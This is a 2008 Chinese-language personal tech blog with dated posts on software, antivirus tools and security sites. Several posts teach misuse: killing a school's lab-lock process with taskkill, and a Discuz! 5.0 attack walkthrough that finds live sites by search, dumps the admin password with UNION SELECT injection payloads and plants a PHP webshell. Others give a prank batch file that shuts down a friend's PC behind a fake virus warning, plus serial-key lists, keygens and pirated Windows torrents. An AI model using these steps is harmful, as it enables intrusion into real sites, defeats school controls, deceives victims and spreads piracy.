2008年5月31日 星期六

自學電腦世界各種新知

經常覺得自己的知識不夠麼,那麼可以使用Google,Wikipedia ( 維基百科 ) 搜尋各種的資訊/資料,充實自己的知識。

Google 是一個非常良好的搜尋器,各種資訊也可以使用它來搜尋出來,支援各種的搜尋語法,可以加快找到所需要的資料。以下附上一本電子書,出版自O'Reilly 的,稱為  介紹Google 的使用方法。

下載Google- The missing manual

Wikipedia ( 維基百科 ) 是一個網上的百科全書,近乎所有你不明白的東西,也可以在這裏找到答案啊!而且更有各種的語言。

http://www.wikipedia.org/


2008年5月28日 星期三

解除學校電腦鎖機

在學校,老師會因為教學理由,將學生的電腦全部鎖定,使學習更有效率,但是學生是可以突破限制,解除鎖定。

理論:檢查工作管理員,查看是否有student.exe 的程序,學校鎖機系統的程式,常名為student.exe ,只要把它結束後,鎖機的功能將會失效。

方法:

1) 使用工作管理員停止student.exe 程序。
2) 使用CMD (命令提示字元) 停止 student.exe 程序。

命令:
taskkill /f /im student.exe

3) 將以上指令存成bat 檔案執行。

2008年5月26日 星期一

DISCUZ 論壇下載

Discuz! 是一個著名的國內PHP論壇程式,現時最新版本為6.0.0 RC1, 各位可以在以下的網站找到2.0.0 的版本,試試找出漏洞,並利用漏洞,增強各位的安全意識,以及鞏固PHP的認知。


http://download.comsenz.com/Discuz/

希望各位可以好好利用,在自己的電腦架伺服器,可以使用Appserv 。

2008年5月25日 星期日

Discuz 5.0 討論區漏洞

我最近瀏覽網站時,找到一個網誌說Discuz 5.0 的漏洞。

dz5最近出現了爆管理員密碼漏洞,問題出在pm.php,好友群發那裡.代碼如下:
3800hk

利用方法:
工具dz5.htm

1 在google裡輸入關鍵詞:Powered by Discuz! 5.0.0 搜索,找到入侵網站,也可以用網站獵手.
2 打開要入侵的網站,註冊一個用戶,登錄,在底部 清除 Cookies 處點右鍵,屬性,找到hash值,將其複製到利用工具裡hash裡,同時複製網址到工具url裡.
3查看右上角的會員 找到其版主的用戶名和id 把用戶名填到工具的msgto裡,修改 用ID值修改UID=1 中的1,點gogogo即可爆出密碼
3 找到成功利用可以爆出管理員密碼,登錄後台,然後在模版那裡,可以直接修改,選擇任一文件,插入lanke的php一句馬,用lanke 的客戶端連接,提交變量,成功會有環境變量的顯示,利用就成功了!



有時爆出的密碼只有15位,大家不會破解吧,那就按下面的方法就行啦!

15位有辦法解決的
你把SQL語句換一下啊
0) union select length(password),2,0 from cdb_members where uid=1/*
這句是得到MD5長度
0) union select left(password,15),2,0 from cdb_members where uid=1/*
這句得到MD5前15位
0) union select SUBSTRING(password,16,15),2,0 from cdb_members where uid=1/*
這句得到MD5 16-30位
0) union select right(password,2),2,0 from cdb_members where uid=1/*
這句得到MD5 31-32位
MD5一共是32位的

2008年5月23日 星期五

安全網站推介


想再網絡、系統安全下多番功夫? 又或是想找找電腦資料安全相關資料,可以試試這個網站:

http://www.packetstormsecurity.org/
PacketStormSecurity

裡面收藏有不少C 程式的原始碼,而且是高級至關於網絡編程,適合專家閱覽,當中著名的木馬程式,如Back Orifice, BO2K 等。

2008年5月20日 星期二

Appserv 2.6.0 最新版

若果各位還有記憶的話,我之前曾經介紹過這個軟件,這個軟件可以架設動態網站伺服器,與上次不同的是,這個版本是最新的版本,內含有的核心軟件都更新了,防止每天也被發現的漏洞。

這個軟件能架起支援PHP , MYSQL 的伺服器,在學習php 的朋友,不妨試試這個,安裝後可以用來實習實習啊。

當中PHP 程式,不少有安全漏洞,如SQL Injection Vulnerability , XSS (Cross Site Scripting) , code Injection ... ... 這些都可以在自行架設的伺服器中嘗試,但當然要自己寫一些含有漏洞的程式吧!

2008年5月18日 星期日

Windows 2000 ~ Windows Vista 系統內核漏洞(MS08-025)

Windows 2000 至 Windows Vista ,包括 Windows Server 2008 ,都存有以下一個本地權限提升(Local Privilege Escalation)的漏洞。若果攻擊者成功利用這個漏洞,可以在受影響系統執行任意命令,如新增帳戶或安裝軟件等。

這個漏洞是由於win32k.sys中,對使用者提供的記憶體指標(pointer),沒有足夠的驗證。

但此漏洞只適用於一個可觸摸的電腦而進行入侵,進行權限提升,而因為大部份的電腦都未修正這個漏洞,故此在這裏不詳述。

2008年5月17日 星期六

安全漏洞公佈網站

經常在別人口中聽到漏洞一詞,究竟你對它的認識又有多少呢?
你可以在以下這個網站找到一些最近發現的漏洞,一些常用軟件或是作業系統的漏洞都有講。

http://www.securityfocus.com/

這個是英文網站,若果英文還有小小功力的,可以看看。

關於之前有些軟件的連結失效,若有需要,可以連絡我。

MSN : clsdennis2007@hotmail.com

2008年5月15日 星期四

免費病毒防護軟件


AVG、卡巴斯基、NOD32、Avast,大家用得多了,是否有點生厭,或是想有些新體驗。那各位可以試試免費的ClamWin 掃毒軟件,那是由C (好像是C++)寫成的,也開放原始碼。

我在這裏給大家一個隨身攜帶版本,可以安裝在手指裏,帶到其他地方,但它好像沒有實時防護的功能,看書好像要加上WinPooch才做到這個功能。

下載ClamWin 隨身攜帶版本防毒軟件

關於WinPooch,這個軟件其實是檔案和系統的註冊表(Registry)的監控軟件,病毒通常會修改系統的註冊表資訊,以及系統重要檔案,使達到某些目的,一般有隨系統啟動而啟動的功能,在開啟程式時自動感染其他檔案等,但它不可以取代防毒軟件。

2008年5月13日 星期二

Power2Go V6 Deluxe 燒碟軟件

前陣子,裝了Nero 這套燒錄軟件,再查看C:\ 的容量,看到Nero 用了我接迎2 GB的硬碟,看到實在不高興,因為系統纖小就是快嗎? 結果,在四月那次因為電腦怪怪的,所以重裝,就選來這款軟件試試,應該也不錯吧!

這個軟件可以在官方網站下載得到。

http://tw.cyberlink.com/multi/products/main_24_CHT.html

序號在此不提供了,要的可以到Google 找序號機放在Virtual PC 裡用。

2008年5月12日 星期一

序號大全

序號的搜尋有時非常困難,但大型軟件也面對著一個問題,就是找來的網頁是不是安全,按下去可能隨時感染木馬病毒,那麼現在提供您兩個文字檔案,一個是載有不同軟件的序號,第二個是舊版Windows 的序號。

Windows 序號檔案

軟件序號檔案

ThreatFire 惡意程式/病毒監控

病毒經常破壞您的系統,但沒有被防毒偵測出來嗎?只要您安裝了ThreatFire 3.0 這套的免費軟件,它可以即時監察您的系統,當發現可疑動作時,會詢問使用者是否繼續進行,這種稱為主動式防禦的HIPS ( Host-based intrusion detection system ) 能夠填補一般防毒軟件的不足,在防毒軟件公司釋出病毒碼前的「真空期」,在恰當使用下,可以得到一定程度的保障。

ThreatFire 3.0 若個人使用是免費的,不用付任何費用,更新後,可以擁有掃瞄威脅的功能。

Windows XP SP3 更新


Windows XP SP2 這個版本的XP已推出一段時間了,現在微軟公司推出了一個重大的修正集合檔案-Windows XP SP3 。這個更新修正Windows XP 內不少的漏洞,加強了資訊安全。

下載Windows XP SP3 更新檔案

我魔法大師已經在我進行實驗的虛擬電腦裝上了Windows XP SP3 ,緊貼最新的發展,當然還保留了舊版本,以備不時之需吧!

若果還在使用舊版的,可能會被黑客入侵啊!建議各位趕快更新。

2008年5月10日 星期六

uTorrent 1.7.7 小巧BT 軟件

在要求甚麼也小巧的情況,避免系統速度因為硬碟的碎片而減慢,可以試試以下介紹的這款BitTorrent 客戶端(client)軟件,容量只有200 多KB ,非常適合各位,特別是要求纖細的用家。

這個軟件的設定值也頗多的,但設定值可以保持預設值,軟件也可以正常運作。

各位可以在以下的網站下載uTorrent 1.7.7

官方網站:http://www.utorrent.com

2008年5月7日 星期三

自己小把戲玩弄朋友

有沒有想戲弄一下朋友的想頭? 現在有一個機會了,您可以製作一個BAT檔,便可以顯示一個對話方塊,1分鐘(或您自己定的時間) 後把您好朋友的電腦關掉,但是可以使用一個小指令解除,以下教您如何製作這個小玩意。閒時沒有東西可幹,寄給別人嚇他人一驚都不錯的。

1.開啟記事本輸入以下的內容:

shutdown -s -t 60 /c 你的電腦感染了病毒,在關機完成時,病毒便會完成感染程序。









2.按檔案>儲存,在檔案名稱後,加上 .BAT 這個副檔名。

3.在MSN或Yahoo! Messenger 寄信你的朋友。

但是MSN 是限制著不允許寄送BAT 副檔名的檔案。

2008年5月4日 星期日

Windows 作業系統全集

Windows 相信各位用得多,但是有沒有想過試試用舊版的Windows,例如DOS / Windows 3.1,體驗一下從前使用電腦的感覺。

現在有機會給各位親身體驗一下了,下載以下的BT 種子,一齊體驗舊版Windows 吧!

裡面收藏了由DOS 至 Windows Vista 的作業系統... ...

DOS
Windows 3.1
Windows 95
Windows NT 4.0
Windows 98
Windows 2000
Windows XP Professional
Windows Vista Ultimate

但是遺憾的是沒有了Windows ME... 有機會也找它出來,和各位分享

下載